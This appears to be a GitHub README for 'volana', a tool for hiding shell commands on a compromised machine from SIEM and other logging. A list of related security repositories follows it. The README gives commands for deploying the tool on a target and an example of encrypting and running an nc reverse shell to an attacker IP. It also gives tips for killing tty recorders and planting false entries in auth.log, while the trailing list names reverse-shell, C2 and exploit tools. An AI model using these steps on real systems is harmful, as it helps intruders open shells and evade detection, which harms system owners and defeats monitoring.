Volana - Shell command obfuscation to avoid detection systems

Overview

volana (moon in malagasy)

{ Use it ; ๐ŸŒš(hide from); ๐ŸŒž(detected by) } 

Shell command obfuscation to avoid SIEM/detection system

During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage

Usage

You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana ยป echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana ยป [command]

Keyword for volana console:

  • ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call)
  • exit: exit volana console

from non interactive shell

Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

On attacker machine

## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy encrypted command and executed it with your rce on target machine

./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

Because we want to be protected against system that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

Detection

Keep in mind that volana is not a miracle that will make you totally invisible. It aim is to make intrusion detection and investigation harder.

By detected we mean if we are able to trigger an alert if a certain command has been executed.

Hide from

Only the volana launching command line will be catched

  • Detection systems that are based on history command output
  • Detection systems that are based on history files
    • .bash_history, ".zsh_history" etc ..
  • Detection systems that are based on bash debug traps
  • Detection systems that are based on sudo built-in logging system
  • Detection systems tracing all processes syscall system-wide (eg opensnoop)
  • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
    • Command detection Could be avoid with volana with encryption

Visible for

  • Detection systems that have alert for unknown command (volana one)
  • Detection systems that are based on keylogger
    • Easy to avoid: copy/past commands
    • Not a common case
  • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:`logger -p auth.info "No hacker is poisoning your syslog solution, don't worry"
  • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
    • Difficult to analyze, could be make unreadable by making several diversion syscalls
  • Custom LD_PRELOAD injection to make log
    • Not a common case at all

Bug bounty

Sorry for the clickbait title, but no money will be provided for contibutors. ๐Ÿ›

Let me know if you have found:

  • a way to detect volana
  • a way to spy console that don't detect volana commands
  • a way to avoid a detection system

Report here

Credit

Releases(v1.0.0)
Owner
Ariary
Security Engineer naively hoping that his technical background will one day be more effective than social engineering
Ariary
null 8 Dec 20, 2021
Cossack Labs 1k Jun 22, 2022
Ah shhgit! Find secrets in your code. Secrets detection for your GitHub, GitLab and Bitbucket repositories: www.shhgit.com

shhgit helps secure forward-thinking development, operations, and security teams by finding secrets across their code before it leads to a security br

Paul 3.5k Jun 23, 2022
EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.

EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptograp

American Express 492 Jun 16, 2022
Log4j detector and reporting server for scalable detection of vulnerable running processes.

Log4j Detector A client and reporting server to identify systems vulnerable to Log4j at scale. This work is based on Stripe's Remediation Tools, but w

Praetorian 8 Apr 8, 2022
Find secrets and passwords in container images and file systems

Find secrets and passwords in container images and file systems

null 1.3k Jun 21, 2022
SPIRE is a toolchain of APIs for establishing trust between software systems across a wide variety of hosting platforms

SPIRE (the SPIFFE Runtime Environment) is a toolchain of APIs for establishing trust between software systems across a wide variety of hosting platforms

SPIFFE 1.2k Jun 22, 2022
Scans and catches callbacks of systems that are impacted by Log4J Log4Shell vulnerability across specific headers.

Log4ShellScanner Scans and catches callbacks of systems that are impacted by Log4J Log4Shell vulnerability across specific headers. Very Beta Warning!

null 56 Jun 17, 2022
Scanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability (CVE-2021-44228)

scan4log4shell Scanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability CVE-2021-4

Frank Hรผbner 11 Feb 27, 2022
Scan systems and docker images for potential spring4shell vulnerabilities.

Scan systems and docker images for potential spring4shell vulnerabilities. Will detect in-depth (layered archives jar/zip/tar/war and scans for vulnerable Spring4shell versions. Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.

null 11 May 6, 2022
Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

Gofrette Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

null 11 May 9, 2022
Exploit for remote command execution in Golang go get command.

CVE-2018-6574 Exploit for remote command execution in Golang go get command. Introduction When you go get a package, Go is designed to build and insta

Devang Solanki 0 Oct 15, 2021
Serpscan is a powerfull php script designed to allow you to leverage the power of dorking straight from the comfort of your command line.

SerpScan Serpscan is a powerful PHP tool designed to allow you to leverage the power of dorking straight from the comfort of your command line. Table

Alaa Abdulridha 49 Apr 21, 2022
SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.

SourcePoint SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written in Go. SourcePoint allows unique C2 profiles to be genera

Tylous 612 Jun 18, 2022
Doctl: A command-line interface (CLI) for the DigitalOcean API

doctl doctl is a command-line interface (CLI) for the DigitalOcean API. Usage:

Vรต Phan Hแป“ng Dลฉng 0 Feb 16, 2022
"I do" stops interactive command if there is any potential risky pattern

Description ido (I do) executes your shell command provided as its input, but it may wait for you to confirm when there is some potential risky patter

Ky-Anh Huynh 3 Mar 30, 2022
A Flask-based HTTP(S) command and control (C2) framework with a web frontend. Malleable agents written in Go and scripts written in bash.

โ–„โ–„โ–„โ–„ โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–ˆโ–ˆโ–€โ–ˆโ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–„โ–„โ–„โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–“โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–’โ–“โ–ˆโ–ˆ โ–’ โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–’ โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆ โ–’ โ–“ โ–ˆโ–ˆโ–’ โ–“โ–’ โ–’โ–ˆโ–ˆโ–’ โ–„โ–ˆโ–ˆโ–’โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–ˆโ–ˆ โ–‘โ–“โ–ˆโ–ˆ โ–‘โ–„โ–ˆ โ–’โ–’โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–’โ–‘

Ashley Nikirk 21 Jun 16, 2022
Simple reverse shell to avoid Windows defender and kaspersky detection

Windows-ReverseShell Simple reverse shell to avoid Windows defender, kaspersky d

่ตตๅ…ฌๅญ 11 Jun 9, 2022
A high-performance concurrent scanner written by go, which can be used for survival detection, tcp port detection, and web service detection.

aScan A high-performance concurrent scanner written by go, which can be used for survival detection, tcp port detection, and web service detection. Fu

seventeen 18 Apr 9, 2022
Fast face detection, pupil/eyes localization and facial landmark points detection library in pure Go.

Pigo is a pure Go face detection, pupil/eyes localization and facial landmark points detection library based on Pixel Intensity Comparison-based Objec

Endre Simo 3.7k Jun 21, 2022
Elkeid is a Cloud-Native Host-Based Intrusion Detection solution project to provide next-generation Threat Detection and Behavior Audition with modern architecture.

Elkeid is a Cloud-Native Host-Based Intrusion Detection solution project to provide next-generation Threat Detection and Behavior Audition with modern architecture.

Bytedance Inc. 1.2k Jun 23, 2022
ID hashing and Obfuscation using Knuth's Algorithm

ID Obfuscation/Hashing Transformer for Go There are many times when you want to generate obfuscated ids. This package utilizes Knuth's Hashing Algorit

pj 316 Jun 9, 2022
Automated compiler obfuscation for nim

Denim Makes compiling nim code with obfuscator-llvm easy! Windows only for now, but do you even need compiler obfuscation on other platforms? Setup In

Joe 82 Jun 21, 2022
null 8 Dec 20, 2021
painless task queue manager for shell commands with an intuitive cli interface (execute shell commands in distributed cloud-native queue manager).

EXEQ DOCS STILL IN PROGRESS. Execute shell commands in queues via cli or http interface. Features Simple intuitive tiny cli app. Modular queue backend

Mohammed Al Ashaal 12 Jan 29, 2022
ap ๆ˜ฏไธ€ไธช shell ๅทฅๅ…ท๏ผŒๅฏไปฅ่ฎฉๅ…ถๅฎƒ shell ๅ‘ฝไปค็š„่พ“ๅ‡บ่ƒฝๅคŸ่‡ชๅŠจ่ฟ›ๅ…ฅไบคไบ’็ฟป้กตๆจกๅผ

ap -- auto-pager ap ๆ˜ฏไธ€ไธช shell ๅทฅๅ…ท๏ผŒๅฏไปฅ่ฎฉๅ…ถๅฎƒ shell ๅ‘ฝไปค็š„่พ“ๅ‡บ่ƒฝๅคŸ่‡ชๅŠจ่ฟ›ๅ…ฅไบคไบ’็ฟป้กตๆจกๅผใ€‚ ap ็”ฑไธค้ƒจๅˆ†็ป„ๆˆ๏ผŒไธ€ไธช Go ่ฏญ่จ€็ผ–ๅ†™็š„ไบŒ่ฟ›ๅˆถ็จ‹ๅบ๏ผŒ่ดŸ่ดฃๆ•่Žทๅ‘ฝไปค็š„่พ“ๅ‡บๅนถๆ”ฏๆŒ็ฟป้กต๏ผŒ ๅ’Œไธ€็ป„ shell ่„šๆœฌ๏ผŒ่ดŸ่ดฃไธบ็”จๆˆทๆŒ‡ๅฎš็š„ๅ‘ฝไปคๆธ…ๅ•ๅˆ›ๅปบไธŽไน‹ๅŒๅ็š„ wrapperใ€‚ ็ป

flw 12 Apr 12, 2022
Assume-shell - A tool to create a shell with AWS environment credentials set

assume-shell This tool will request AWS credentials for a given profile/role and

Erik Jansson 2 Feb 14, 2022
Bampf is a simple 3D arcade style game. Collect Energy Cores in order to finish a level. Teleport (bampf) to safety or use cloaking abilities to avoid Sentinels.

Bampf Bampf is a simple 3D arcade style game. Collect energy cores in order to finish a level. Teleport (bampf) to safety or use cloaking abilities to

null 39 Apr 7, 2021
Lambda stack to turn off and destroy all resources from your personal AWS Account to avoid billing surprises

AWS, Turn off my Account, please Lambda stack to turn off and destroy all resources from your personal AWS Account to avoid billing surprises Resource

Matheus Fidelis 63 Apr 10, 2022